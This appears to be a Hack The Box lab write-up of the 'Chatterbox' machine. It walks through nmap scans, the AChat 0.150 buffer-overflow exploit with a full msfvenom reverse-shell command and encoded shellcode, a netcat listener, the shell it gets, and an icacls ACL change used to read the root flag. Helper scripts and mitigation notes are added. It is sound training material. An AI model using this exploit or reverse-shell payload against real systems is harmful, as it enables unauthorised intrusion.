HTB (Hack The Box) is a platform which provides a large number of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally capture two flags, a user flag and a root flag. As I am planning to take the OSCP exam, my focus is to exploit some HTB machines as preparation.
As I tend to remember things more easily when I write them down, I decided to summarize the walkthroughs as documentation for later reference or for anyone who is interested in this topic.
This is my fifth HTB writeup!
Summary
This box is labeled as medium. Even though I am quite new to HTB machines, Chatterbox was very straightforward and easy to solve compared to some other machines. Having only two ports open to start with, I knew where to set my focus. A vulnerable version of AChat is running, which allows an attacker to get a reverse shell on the host via a remote buffer overflow; luckily, there is an existing exploit. Once a first foothold is established, it is possible to read the root flag by using icacls to change the file permissions (possible because the permissions on the Administrator's profile are misconfigured).
1. Reconnaissance
Enumeration
To identify vulnerabilities and proceed to exploitation, it is necessary to do some port scanning and to collect as much information as possible about the target. I start with an Nmap scan to get an overview of open ports and running services.
nmap -A -T4 10.10.10.74 # default scan of the top 1000 ports does not show any open ports
nmap -p- 10.10.10.74 # full TCP port scan identifies two open ports, 9255 and 9256
nmap -A -p 9255,9256 10.10.10.74 -oX nmap/scan.xml # no space after the comma, otherwise the shell passes 9256 as a separate argument
-A: Enable OS detection, version detection, script scanning, and traceroute
-T4: Faster execution (default is T3)
-p-: Scan all 65535 TCP ports (the default scan covers only the 1000 most common ports, which is why the first scan shows nothing)
-oX: Save output as XML
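The two-stage approach above (full port sweep, then a targeted -A scan of what was found) is easy to automate from the XML that -oX writes. The following is an added example, not code from the original writeup: it parses nmap's XML, lists the open ports with their service banners, and builds the follow-up command with a correctly formatted port list. The embedded XML is constructed in the shape nmap emits; the real scan.xml of this box is not reproduced on the page, so the service names are illustrative.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML in the shape `nmap -oX` writes (illustrative, not the
# page's real scan.xml): one filtered port and the two open AChat ports.
SAMPLE_SCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- -oX scan.xml 10.10.10.74" version="7.80">
<host starttime="0" endtime="0">
<status state="up" reason="user-set"/>
<address addr="10.10.10.74" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="tcp" portid="9255"><state state="open" reason="syn-ack"/><service name="http" product="AChat chat system httpd" method="probed" conf="10"/></port>
<port protocol="tcp" portid="9256"><state state="open" reason="syn-ack"/><service name="achat" product="AChat chat system" method="probed" conf="10"/></port>
</ports>
</host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return one dict per open port: host, port, proto, service, product."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else ""
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # skip closed/filtered ports
            svc = port.find("service")
            found.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
            })
    return found


def followup_command(host, ports, out="nmap/scan.xml"):
    """Build the targeted -A scan. Ports are joined without spaces: with
    `-p 9255, 9256` the shell would split the list into two arguments."""
    port_list = ",".join(str(p) for p in sorted(set(ports)))
    return f"nmap -A -p {port_list} {host} -oX {out}"


if __name__ == "__main__":
    hits = open_ports(SAMPLE_SCAN_XML)
    for h in hits:
        print(f"{h['port']}/{h['proto']} {h['service']} {h['product']}")
    print(followup_command("10.10.10.74", [h["port"] for h in hits]))
```

Run the full sweep with `-oX` first, feed that file to `open_ports`, and use `followup_command` for the second scan; the same parser also works on the final scan.xml to pull out product/version strings for searchsploit.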
Scan Result
Open Ports Analysis
Port 9255 and 9256: AChat system
I found this source where the tool can still be downloaded. AChat is a free Windows communication tool for messaging on a local network.
Knowing that AChat is running, the first step is to check whether searchsploit finds an exploit that will help me gain a foothold on the machine.
searchsploit achat
searchsploit -m 36025 # mirror (copy) the exploit into the current directory
2. Gain Access
Achat Python Exploit Code (truncated)
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
....
In the Python script the msfvenom command used to generate the payload is included as a comment; that payload runs calc.exe when the exploit succeeds. As we need a reverse shell instead, we change only the payload and its options, keeping the encoder, the bad-character list and BufferRegister=EAX as they are: the bad characters exclude NUL and every byte above 0x7f because the vulnerable code converts the input to Unicode before it reaches the stack, which only the x86/unicode_mixed encoder survives, and BufferRegister=EAX tells the encoder that EAX points at the shellcode when it starts executing, which the exploit's setup arranges. The new msfvenom command is:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4466 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Executing the above command generates the encoded shellcode. It has to be pasted into the original exploit code, replacing the whole buf block. The b"" prefixes that newer msfvenom versions emit are valid in Python 2 as well, so the lines can be pasted as they are.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x58\x68\x34\x42"
buf += b"\x6d\x30\x59\x70\x39\x70\x53\x30\x31\x79\x79\x55\x4c"
buf += b"\x71\x75\x70\x62\x44\x62\x6b\x52\x30\x50\x30\x44\x4b"
buf += b"\x70\x52\x6c\x4c\x62\x6b\x30\x52\x4e\x34\x54\x4b\x73"
buf += b"\x42\x4d\x58\x4a\x6f\x46\x57\x6f\x5a\x6d\x56\x30\x31"
buf += b"\x4b\x4f\x34\x6c\x6f\x4c\x61\x51\x31\x6c\x79\x72\x4e"
buf += b"\x4c\x4b\x70\x35\x71\x76\x6f\x4c\x4d\x4a\x61\x78\x47"
buf += b"\x57\x72\x4a\x52\x72\x32\x50\x57\x62\x6b\x42\x32\x6e"
buf += b"\x30\x34\x4b\x50\x4a\x6f\x4c\x72\x6b\x4e\x6c\x6a\x71"
buf += b"\x42\x58\x58\x63\x4e\x68\x6a\x61\x77\x61\x4e\x71\x64"
buf += b"\x4b\x51\x49\x4b\x70\x49\x71\x66\x73\x64\x4b\x71\x39"
buf += b"\x4e\x38\x67\x73\x4f\x4a\x51\x39\x72\x6b\x70\x34\x34"
buf += b"\x4b\x4b\x51\x39\x46\x70\x31\x49\x6f\x36\x4c\x37\x51"
buf += b"\x58\x4f\x7a\x6d\x7a\x61\x46\x67\x6d\x68\x4b\x30\x71"
buf += b"\x65\x59\x66\x59\x73\x43\x4d\x79\x68\x4d\x6b\x43\x4d"
buf += b"\x6e\x44\x43\x45\x37\x74\x6e\x78\x32\x6b\x42\x38\x4e"
buf += b"\x44\x4a\x61\x56\x73\x63\x36\x52\x6b\x5a\x6c\x50\x4b"
buf += b"\x52\x6b\x61\x48\x6b\x6c\x59\x71\x36\x73\x44\x4b\x5a"
buf += b"\x64\x52\x6b\x69\x71\x5a\x30\x35\x39\x30\x44\x6c\x64"
buf += b"\x4c\x64\x61\x4b\x61\x4b\x6f\x71\x62\x39\x31\x4a\x72"
buf += b"\x31\x49\x6f\x39\x50\x51\x4f\x51\x4f\x51\x4a\x74\x4b"
buf += b"\x4e\x32\x6a\x4b\x42\x6d\x31\x4d\x70\x68\x6c\x73\x4c"
buf += b"\x72\x49\x70\x49\x70\x53\x38\x62\x57\x64\x33\x6e\x52"
buf += b"\x51\x4f\x4e\x74\x63\x38\x4e\x6c\x62\x57\x4c\x66\x6b"
buf += b"\x57\x6b\x4f\x6a\x35\x45\x68\x52\x70\x6d\x31\x6b\x50"
buf += b"\x4b\x50\x4c\x69\x56\x64\x6f\x64\x52\x30\x71\x58\x4d"
buf += b"\x59\x73\x50\x72\x4b\x4d\x30\x69\x6f\x37\x65\x50\x50"
buf += b"\x50\x50\x72\x30\x6e\x70\x61\x30\x62\x30\x6d\x70\x32"
buf += b"\x30\x43\x38\x5a\x4a\x4a\x6f\x37\x6f\x77\x70\x49\x6f"
buf += b"\x59\x45\x52\x77\x30\x6a\x39\x75\x30\x68\x79\x7a\x4b"
buf += b"\x5a\x7a\x6e\x6d\x42\x62\x48\x4b\x52\x6b\x50\x7a\x71"
buf += b"\x62\x52\x45\x39\x6a\x46\x31\x5a\x5a\x70\x6f\x66\x50"
buf += b"\x57\x53\x38\x73\x69\x43\x75\x71\x64\x43\x31\x79\x6f"
buf += b"\x7a\x35\x74\x45\x55\x70\x73\x44\x5a\x6c\x59\x6f\x4e"
buf += b"\x6e\x4b\x58\x54\x35\x6a\x4c\x61\x58\x68\x70\x68\x35"
buf += b"\x46\x42\x51\x46\x49\x6f\x47\x65\x50\x68\x42\x43\x32"
buf += b"\x4d\x63\x34\x49\x70\x52\x69\x58\x63\x70\x57\x61\x47"
buf += b"\x72\x37\x6e\x51\x59\x66\x4f\x7a\x5a\x72\x51\x49\x30"
buf += b"\x56\x58\x62\x79\x6d\x63\x36\x49\x37\x31\x34\x4b\x74"
buf += b"\x4f\x4c\x39\x71\x69\x71\x74\x4d\x4e\x64\x4d\x54\x4c"
buf += b"\x50\x55\x76\x69\x70\x30\x44\x61\x44\x50\x50\x51\x46"
buf += b"\x71\x46\x61\x46\x50\x46\x72\x36\x70\x4e\x70\x56\x30"
buf += b"\x56\x70\x53\x62\x36\x32\x48\x51\x69\x78\x4c\x6f\x4f"
buf += b"\x51\x76\x69\x6f\x6a\x35\x61\x79\x49\x50\x6e\x6e\x62"
buf += b"\x36\x30\x46\x49\x6f\x30\x30\x53\x38\x6c\x48\x52\x67"
buf += b"\x6d\x4d\x43\x30\x79\x6f\x77\x65\x65\x6b\x58\x70\x66"
buf += b"\x55\x63\x72\x71\x46\x33\x38\x47\x36\x46\x35\x67\x4d"
buf += b"\x73\x6d\x49\x6f\x5a\x35\x4d\x6c\x6b\x56\x53\x4c\x4b"
buf += b"\x5a\x71\x70\x4b\x4b\x6b\x30\x63\x45\x59\x75\x55\x6b"
buf += b"\x6f\x57\x6a\x73\x51\x62\x42\x4f\x6f\x7a\x6d\x30\x52"
buf += b"\x33\x69\x6f\x39\x45\x41\x41"
There is one more change to make: the hard-coded target address in the socket setup has to be changed to 10.10.10.74 (the exploit sends its datagrams to UDP port 9256, hence the SOCK_DGRAM socket).
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
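Two of the manual edits above (pasting the new buf block and fixing server_address) are easy to get subtly wrong, and the bad-character requirement is worth verifying rather than trusting. The following is an added example and not part of the original exploit or the writeup: it reassembles the bytes from msfvenom's -f python output, checks that none of the excluded bytes survived encoding, and splices the new payload and target into the script text. The sample msfvenom output is the first two lines of the payload above; the SAMPLE_EXPLOIT string is a constructed stand-in for the relevant lines of 36025.py, not the full script.

```python
import re

# msfvenom was told to avoid NUL and every byte >= 0x80 (the -b list above).
BADCHARS = bytes([0x00]) + bytes(range(0x80, 0x100))

# Constructed sample: the first lines of `msfvenom -f python` output from above.
SAMPLE_MSFVENOM_OUTPUT = r'''buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
'''

# Constructed stand-in for the lines of 36025.py that matter here (the real
# script has more in between); the buf block and server_address get replaced.
SAMPLE_EXPLOIT = r'''#!/usr/bin/python
import socket
import sys, time
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41"
buf += "\x41\x49\x41\x49"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.0.2', 9256)
'''

# One `buf = ""` / `buf += "..."` line, with or without the b prefix.
BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_python(text):
    """Reassemble the raw payload bytes from the buf lines msfvenom prints."""
    out = bytearray()
    for line in text.splitlines():
        m = BUF_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def find_badchars(payload, badchars=BADCHARS):
    """(offset, value) of every forbidden byte in the payload; empty means OK."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def patch_exploit(script, payload_text, target, port=9256):
    """Replace the buf block with the new payload and retarget server_address."""
    lines = script.splitlines()
    first = next(i for i, l in enumerate(lines) if BUF_LINE.match(l))
    new_buf = [l for l in payload_text.splitlines() if BUF_LINE.match(l)]
    rest = [l for l in lines[first:] if not BUF_LINE.match(l)]
    patched = "\n".join(lines[:first] + new_buf + rest) + "\n"
    patched, n = re.subn(
        r"server_address\s*=\s*\(\s*['\"][^'\"]*['\"]\s*,\s*\d+\s*\)",
        f"server_address = ('{target}', {port})",
        patched,
    )
    if n != 1:
        raise ValueError("expected exactly one server_address assignment")
    return patched


if __name__ == "__main__":
    payload = parse_msfvenom_python(SAMPLE_MSFVENOM_OUTPUT)
    print(f"{len(payload)} bytes, bad bytes: {find_badchars(payload)}")
    print(patch_exploit(SAMPLE_EXPLOIT, SAMPLE_MSFVENOM_OUTPUT, "10.10.10.74"))
```

In practice, read the real 36025.py and the saved msfvenom output from files and write the result back; the bad-character check matters because a single surviving byte above 0x7f is mangled by the Unicode conversion and the shell never connects back.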
Now we can save the Python file, start a listener on the port defined in the payload (4466) and execute the modified script, which triggers the buffer overflow. The original script is Python 2 code (it builds the packets as str objects), so run it with a Python 2 interpreter.
1. nc -nlvp 4466
2. python 36025.py
The attack is successful, and I get a low-privileged reverse shell as the user Alfred.
#nc -nlvp 4466
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4466
Ncat: Listening on 0.0.0.0:4466
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49158.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
Navigating to C:\Users\Alfred\Desktop, it is possible to read the user flag:
c:\Users\Alfred\Desktop>type user.txt
type user.txt
72290....06334
Elevation of Privilege
This step is quite easy and I am not sure whether this is the intended way to get the root flag.
When checking out the directories, we can see that the user Alfred can traverse the Administrator's directory. Normally this should not be possible: a profile folder under C:\Users is accessible only to its owner, SYSTEM and the Administrators group. A quick check of the folder permissions shows:
C:\Users\Administrator\Desktop>icacls C:\Users\Administrator\Desktop
icacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
We can see that Alfred has full control over this folder, its files and subfolders. The entry is marked (I), i.e. inherited from a parent directory, so the misconfiguration lives higher up in the Administrator's profile rather than on the Desktop folder itself.
I - Permission inherited from parent container
OI - Object inherit - This folder and files.
CI - Container inherit - This folder and subfolders.
F - Full Access
The problem is that the file root.txt itself has a more restrictive ACL than the folder, so Alfred cannot read it directly. Changing a file's ACL with icacls requires WRITE_DAC on that file, which the owner of a file always has; full control on the parent directory only covers permissions the file inherits from it, so it is worth checking the file's own ACL and owner (icacls root.txt and dir /q) to understand why the change goes through. Here it does, and we can use the following command to grant Alfred read permission on the file and then read the root flag:
C:\Users\Administrator\Desktop>icacls root.txt /grant Alfred:(R)
icacls root.txt /grant Alfred:(R)
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d....dcc7c
Mitigation
AChat 0.150 beta7 has a remote buffer overflow. The service should not be exposed; if patching is not an option, the tool should be replaced. Until then, access to ports 9255 and 9256 should be restricted to the hosts that need it.
Normally a standard user must not be able to access the Administrator's profile folder. The ACLs under C:\Users should be reviewed and the inherited full-control entry for Alfred removed where it is defined.
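The permission check done by hand above (icacls on the Administrator's Desktop, then reading which principals hold write-capable rights) can be turned into a small review script. The following is an added example and not part of the original writeup: it parses icacls output, splits each ACE into its inheritance flags and rights, and reports every principal outside a trusted set that holds an allow ACE with a right that lets it modify content or the DACL. The sample input is the icacls output shown above; the trusted set and the WRITE_RIGHTS table are my choices, not anything the page defines.

```python
import re

# icacls output as shown above (sample input); the first line carries the path.
SAMPLE_ICACLS = r"""C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# icacls rights (simple and specific forms) that allow changing data or the ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "WD", "AD", "WEA", "DC", "WDAC", "WO"}

# Principals expected to have full control over an administrator's profile
# (assumption for this host; the local Administrator name is host-specific).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "CHATTERBOX\\Administrator"}

# "<principal>:(flag)(flag)..." with the principal possibly containing spaces.
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Return [(principal, [flags...])] for every ACE printed for `path`."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()  # first line: strip the path prefix
        m = ACE_RE.match(line)
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        flags = re.findall(r"\(([^)]*)\)", m.group(2))
        aces.append((m.group(1), flags))
    return aces


def rights_of(flags):
    """Flatten '(I)(OI)(CI)(F)' or '(RX,W)' style flags into a set of tokens."""
    return {r.strip() for f in flags for r in f.split(",")}


def untrusted_writers(aces, trusted):
    """Principals outside `trusted` that hold a write-capable allow ACE."""
    hits = []
    for principal, flags in aces:
        rights = rights_of(flags)
        if principal in trusted or "DENY" in rights:
            continue  # deny ACEs restrict rather than grant
        if rights & WRITE_RIGHTS:
            hits.append(principal)
    return hits


if __name__ == "__main__":
    aces = parse_icacls(SAMPLE_ICACLS, r"C:\Users\Administrator\Desktop")
    for principal, flags in aces:
        print(f"{principal:32} {''.join('(' + f + ')' for f in flags)}")
    print("unexpected write access:", untrusted_writers(aces, TRUSTED))
```

Because the offending entry is inherited, removing it on the Desktop folder alone does not work; remove the grant where it is defined (the parent profile directory) or break inheritance on the folder with icacls /inheritance:d before editing its ACL.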
Other WriteUps
Hack the Box — Devel (1)
Hack the Box — Servmon (2)
Hack the Box — Jeeves(10)